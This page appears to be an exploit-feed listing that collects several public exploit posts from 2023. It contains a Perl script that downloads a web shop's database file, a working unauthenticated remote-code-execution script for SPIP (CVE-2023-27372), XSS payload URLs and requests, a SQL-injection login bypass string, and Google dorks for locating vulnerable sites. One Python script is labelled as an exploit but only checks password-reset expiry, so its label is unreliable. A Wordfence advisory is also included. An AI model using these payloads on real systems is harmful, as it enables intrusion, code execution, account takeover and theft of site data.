Latest exploits :: CodePwn

<pre><code>==================================================================================================================================== | # Title : A cart 2.0 Database Disclosure Exploit | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) | | # Vendor : http://ToastForums.com | | # Dork : | ==================================================================================================================================== poc : [-] Download the database: The following Perl exploit will attempt to download the (acart.mdb ) file The (acart.mdb) It is the database and contains all the data . [+] Dorking İn Google Or Other Search Enggine. [+] save code as perl file : poc.pl [+] code : #!/usr/bin/perl -w # # A_cart 2.0 Database Disclosure Exploit # # Author : indoushka # # Vondor : ToastForums.com use LWP::Simple; use LWP::UserAgent; system('cls'); system('A_cart 2.0 Database Disclosure Exploit'); system('color a'); if(@ARGV < 2) { print "[-]How To Use\n\n"; &help; exit(); } sub help() { print "[+] usage1 : perl $0 site.com /path/ \n"; print "[+] usage2 : perl $0 localhost / \n"; } ($TargetIP, $path, $File,) = @ARGV; $File="acart2_0.mdb"; my $url = "http://" . $TargetIP . $path . $File; print "\n Fuck you wait!!! \n\n"; my $useragent = LWP::UserAgent->new(); my $request = $useragent->get($url,":content_file" => "D:/acart2_0.mdb"); if ($request->is_success) { print "[+] $url Exploited!\n\n"; print "[+] Database saved to D:/acart2_0.mdb\n"; exit(); } else { print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n"; exit(); } Greetings to :============================================================================== jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | ============================================================================================ </code></pre>

<pre><code>==================================================================================================================================== | # Title : 3CX Open Standards Software IP PBX Thailand v 2.0.3 XSS Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) | | # Vendor : https://3cx.com | | # Dork : intext:''3CX: Open Standards Software IP PBX'' | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine . [+] use payload : /eventdetail.php?type_id=43&events_id=<marquee>Hacked by indoushka</marquee> [+] http://127.0.0.1/3cx/eventdetail.php?type_id=43&events_id=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E ====Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh | =========================================================================================================================================== </code></pre>

<pre><code>#!/usr/bin/env python3 # -*- coding: utf-8 -*- # Exploit Title: SPIP v4.2.1 - Remote Code Execution (Unauthenticated) # Google Dork: inurl:"/spip.php?page=login" # Date: 19/06/2023 # Exploit Author: nuts7 (https://github.com/nuts7/CVE-2023-27372) # Vendor Homepage: https://www.spip.net/ # Software Link: https://files.spip.net/spip/archives/ # Version: < 4.2.1 (Except few fixed versions indicated in the description) # Tested on: Ubuntu 20.04.3 LTS, SPIP 4.0.0 # CVE reference : CVE-2023-27372 (coiffeur) # CVSS : 9.8 (Critical) # # Vulnerability Description: # # SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. Branches 3.2, 4.0, 4.1 and 4.2 are concerned. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1. # This PoC exploits a PHP code injection in SPIP. The vulnerability exists in the `oubli` parameter and allows an unauthenticated user to execute arbitrary commands with web user privileges. # # Usage: python3 CVE-2023-27372.py http://example.com import argparse import bs4 import html import requests def parseArgs(): parser = argparse.ArgumentParser(description="Poc of CVE-2023-27372 SPIP < 4.2.1 - Remote Code Execution by nuts7") parser.add_argument("-u", "--url", default=None, required=True, help="SPIP application base URL") parser.add_argument("-c", "--command", default=None, required=True, help="Command to execute") parser.add_argument("-v", "--verbose", default=False, action="store_true", help="Verbose mode. (default: False)") return parser.parse_args() def get_anticsrf(url): r = requests.get('%s/spip.php?page=spip_pass' % url, timeout=10) soup = bs4.BeautifulSoup(r.text, 'html.parser') csrf_input = soup.find('input', {'name': 'formulaire_action_args'}) if csrf_input: csrf_value = csrf_input['value'] if options.verbose: print("[+] Anti-CSRF token found : %s" % csrf_value) return csrf_value else: print("[-] Unable to find Anti-CSRF token") return -1 def send_payload(url, payload): data = { "page": "spip_pass", "formulaire_action": "oubli", "formulaire_action_args": csrf, "oubli": payload } r = requests.post('%s/spip.php?page=spip_pass' % url, data=data) if options.verbose: print("[+] Execute this payload : %s" % payload) return 0 if __name__ == '__main__': options = parseArgs() requests.packages.urllib3.disable_warnings() requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL' try: requests.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL' except AttributeError: pass csrf = get_anticsrf(url=options.url) send_payload(url=options.url, payload="s:%s:\"<?php system('%s'); ?>\";" % (20 + len(options.command), options.command)) </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : https://www.netartmedia.net/talroo-jobs │ │ Vendor : NetArt Media │ │ Software : Talroo Jobs Script 1.0 │ │ Vuln Type: Reflected XSS │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ The attacker can send to victim a link containing a malicious URL in an email or │ │ instant message can perform a wide variety of actions, such as stealing the victim's │ │ session token or login credentials │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /index.php URL parameter is vulnerable to RXSS https://www.website/index.php?page=jobs&category=1&lrw3e"onmouseover="confirm(1)"style="position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b"k1n44=1 [-] Done </code></pre>

<pre><code>On May 22, 2023, our Wordfence Threat Intelligence team identified and began the responsible disclosure process for an Authentication Bypass vulnerability in StylemixThemes’s BookIt plugin, which is actively installed on more than 10,000 WordPress websites. The vulnerability makes it possible for an attacker to gain access to any account on the site, including the administrator account, if the attacker knows their email address. Wordfence Premium, Wordfence Care, and Wordfence Response users received a firewall rule to protect against any exploits targeting this vulnerability on May 22, 2023. Sites still using the free version of Wordfence will receive the same protection on June 21, 2023. We contacted StylemixThemes on May 22, 2023, and received a response the next day. After providing full disclosure details, the developer released the first patch on May 31, 2023, which still contained a vulnerability and then released the fully patch on June 13, 2023. We would like to commend the StylemixThemes development team for their prompt response and timely patch. We urge users to update their sites with the latest patched version of BookIt, version 2.3.8 at the time of this writing, as soon as possible. READ THIS POST ON THE BLOG Vulnerability Summary from Wordfence Intelligence Description: BookIt <= 2.3.7 – Authentication Bypass Affected Plugin: Booking Calendar | Appointment Booking | BookIt Plugin Slug: bookit Affected Versions: <= 2.3.7 CVE ID: CVE-2023-2834 CVSS Score: 9.8 (Critical) CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/ Researcher/s: Lana Codes Fully Patched Version: 2.3.8 The BookIt plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.3.7. This is due to insufficient verification on the user being supplied during booking an appointment through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email. Technical Analysis The BookIt plugin provides the shortcode ‘[bookit]‘ to embed an appointment booking calendar into a page on a WordPress site. By using this functionality, after selecting the date and time in the calendar, it is possible to book an appointment by providing the name, email address, and password for registration. Examining the code reveals that the plugin checks for the user id based on the email address supplied via the ‘email’ parameter. If the email belongs to an existing WordPress user, it will associate the request to that user and set the authentication cookies for that user. [View this code snippet on the blog] Unfortunately, this functionality was insecurely implemented as it does not include any authentication checks such as password verification. It is simply looking for an identity and authorizing that claim without proper verification and authentication. This makes it possible for threat actors to bypass authentication and gain access to arbitrary accounts on sites running a vulnerable version of the plugin. As always, this makes it easy for threat actors to completely compromise a vulnerable WordPress site and further infect the victim. Disclosure Timeline May 22, 2023 – Discovery of the Authentication Bypass vulnerability in BookIt. May 22, 2023 – We initiate contact with the plugin vendor asking that they confirm the inbox for handling the discussion. May 22, 2023 – Wordfence Premium, Care, and Response users receive a firewall rule to provide protection against any exploits that may target this vulnerability. May 23, 2023 – The vendor confirms the inbox for handling the discussion. May 23, 2023 – We send over the full disclosure details. The vendor acknowledges the report and begins working on a fix. June 13, 2023 – A fully patched version of the plugin, 2.3.8, is released. July 21, 2023 – Wordfence Free users receive the same protection. Conclusion In this blog post, we have detailed an Authentication Bypass vulnerability within the BookIt plugin affecting versions 2.3.7 and earlier. This vulnerability allows threat actors to bypass authentication and gain access to accounts of users, if the attacker knows the email address. The vulnerability has been fully addressed in version 2.3.8 of the plugin. We encourage WordPress users to verify that their sites are updated to the latest patched version of BookIt as soon as possible. Wordfence Premium, Wordfence Care, and Wordfence Response users received a firewall rule to protect against any exploits targeting this vulnerability on May 22, 2023. Sites still using the free version of Wordfence will receive the same protection on June 21, 2023. If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as this vulnerability poses a significant risk. For security researchers looking to disclose vulnerabilities responsibly and obtain a CVE ID, you can submit your findings to Wordfence Intelligence and potentially earn a spot on our leaderboard. </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : https://www.netartmedia.net/php-hotel-booking │ │ Vendor : NetArt Media │ │ Software : PHP Hotel Site 2.0 │ │ Vuln Type: Stored XSS │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ Allow Attacker to inject malicious code into website, give ability to steal sensitive │ │ information, manipulate data, and launch additional attacks. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ## Stored XSS ----------------------------------------------- POST /booking/index.php HTTP/2 page=book&id=0&room_code=F753N132&room_name=Standard+double+room&price=&start_time=1687237200&end_time=1687410000&nights=&ProceedBooking=1&name=[XSS Payload]&email=abc%40abc.com&phone=[XSS Payload]&code=28649&remarks=[XSS Payload] ----------------------------------------------- POST parameter 'name' is vulnerable to XSS POST parameter 'phone' is vulnerable to XSS POST parameter 'remarks' is vulnerable to XSS ## Steps to Reproduce: 1. At the index page Search for your Booking (as Guest) 2. Select any Room by Press [Book Now] 3. Inject your [XSS Payload] in "Name" 4. Inject your [XSS Payload] in "Phone" 5. Inject your [XSS Payload] in "Remarks " 6. Press [Book Now] to Submit You will receive to (Thank you. You'll receive an email when your booking is confirmed.) 6. When the Admin Login to the Administration Panel on this Path (https://website/booking/admin/index.php) 7. XSS will Fire & Executed on his Browser Instantly After the Login [-] Done </code></pre>

<pre><code># Exploit Title: WordPress Theme Medic v1.0.0 - Weak Password Recovery Mechanism for Forgotten Password # Dork: inurl:/wp-includes/class-wp-query.php # Date: 2023-06-19 # Exploit Author: Amirhossein Bahramizadeh # Category : Webapps # Vendor Homepage: https://www.templatemonster.com/wordpress-themes/medic-health-and-medical-clinic-wordpress-theme-216233.html # Version: 1.0.0 (REQUIRED) # Tested on: Windows/Linux # CVE: CVE-2020-11027 import requests from bs4 import BeautifulSoup from datetime import datetime, timedelta # Set the WordPress site URL and the user email address site_url = 'https://example.com' user_email = 'user@example.com' # Get the password reset link from the user email # You can use any email client or library to retrieve the email # In this example, we are assuming that the email is stored in a file named 'password_reset_email.html' with open('password_reset_email.html', 'r') as f: email = f.read() soup = BeautifulSoup(email, 'html.parser') reset_link = soup.find('a', href=True)['href'] print(f'Reset Link: {reset_link}') # Check if the password reset link expires upon changing the user password response = requests.get(reset_link) if response.status_code == 200: # Get the expiration date from the reset link HTML soup = BeautifulSoup(response.text, 'html.parser') expiration_date_str = soup.find('p', string=lambda s: 'Password reset link will expire on' in s).text.split('on ')[1] expiration_date = datetime.strptime(expiration_date_str, '%B %d, %Y %I:%M %p') print(f'Expiration Date: {expiration_date}') # Check if the expiration date is less than 24 hours from now if expiration_date < datetime.now() + timedelta(hours=24): print('Password reset link expires upon changing the user password.') else: print('Password reset link does not expire upon changing the user password.') else: print(f'Error fetching reset link: {response.status_code} {response.text}') exit() </code></pre>

<pre><code>==================================================================================================================================== | # Title : WordPress - Kero jQuery/HTML Dashboard PRO Auth BY pass Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0.2(64-bit) | | # Vendor : https://dashboardpack.com/theme-details/kero-jquery-html-dashboard-pro/ | | # Dork : | ==================================================================================================================================== P0C : [+] Dorking İn Google Or Other Search Enggine. [+] Use payload : /panel/sign-in.php [+] User & Pass : ' or 0=0 # [+] https://127.0.0.1/spdmuniversal.in/panel/sign-in.php Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg | ======================================================================================================================================= </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : https://www.netartmedia.net/blog-lite │ │ Vendor : NetArt Media │ │ Software : Blog LITE 2.1 │ │ Vuln Type: Stored XSS │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ Allow Attacker to inject malicious code into website, give ability to steal sensitive │ │ information, manipulate data, and launch additional attacks. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ## Stored XSS --------------------------------------------------------- POST /blog/index.php HTTP/2 -----------------------------401019026540470155022776857270 Content-Disposition: form-data; name="title" [XSS Payload] -----------------------------401019026540470155022776857270 Content-Disposition: form-data; name="content" -----------------------------401019026540470155022776857270 Content-Disposition: form-data; name="author" [XSS Payload] -----------------------------401019026540470155022776857270 Content-Disposition: form-data; name="email" -----------------------------401019026540470155022776857270 ## Steps to Reproduce: 1. Visit Any Category on the Blog 2. Write a comment (as Guest) 3. Inject your [XSS Payload] in "Comment Title" 4. Inject your [XSS Payload] in "Your Name" 5. Submit 6. By default the Blog Disable your comment for Admin Check 7. Admin Check the [BLOG POSTS] in the Administration Panel on this Path (https://website/blog/admin/index.php?page=posts) 8. When the Admin check the comments on this Path (https://website/blog/admin/index.php?page=comments&id=2) 9. XSS Will Fire and Executed on his Browser [-] Done </code></pre>